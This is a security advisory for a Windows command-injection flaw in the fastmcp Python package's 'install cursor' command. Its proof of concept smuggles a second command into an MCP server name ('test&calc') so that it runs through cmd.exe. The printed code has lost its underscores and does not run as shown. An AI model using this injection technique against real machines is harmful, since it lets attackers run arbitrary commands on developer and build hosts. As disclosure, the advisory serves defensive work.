PT-2025-45769 · Pypi · Fastmcp
Published
2025-10-29
·
Updated
2025-10-29
CVSS v4.0
5.4
Medium
| Vector | AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
A command-injection vulnerability lets any attacker who can influence the server name field of an MCP execute arbitrary OS commands on Windows hosts that run fastmcp install cursor
Details
- generate cursor deeplink(server name, …) embeds server name verbatim in a cursor://…?name= query string.
- open deeplink() is invoked with shell=True only on Windows. That calls cmd.exe /c start .
- Any cmd metacharacter inside server name (&, |, >, ^, …) escapes the start command and spawns an attacker-chosen process.
PoC
server.py
import random
from fastmcp import FastMCP
mcp = FastMCP(name="test&calc")
@mcp.tool
def roll dice(n dice: int) -> list[int]:
"""Roll `n dice` 6-sided dice and return the results."""
return [random.randint(1, 6) for in range(n dice)]
if name == " main ":
mcp.run()then run in the terminal:
fastmcp install cursor server.pyImpact
OS Command / Shell Injection (CWE-78)
Every Windows host that runs fastmcp install cursor is at risk. Developers on their local workstations, CI/CD agents and corporate build machines alike.
Fix
OS Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Fastmcp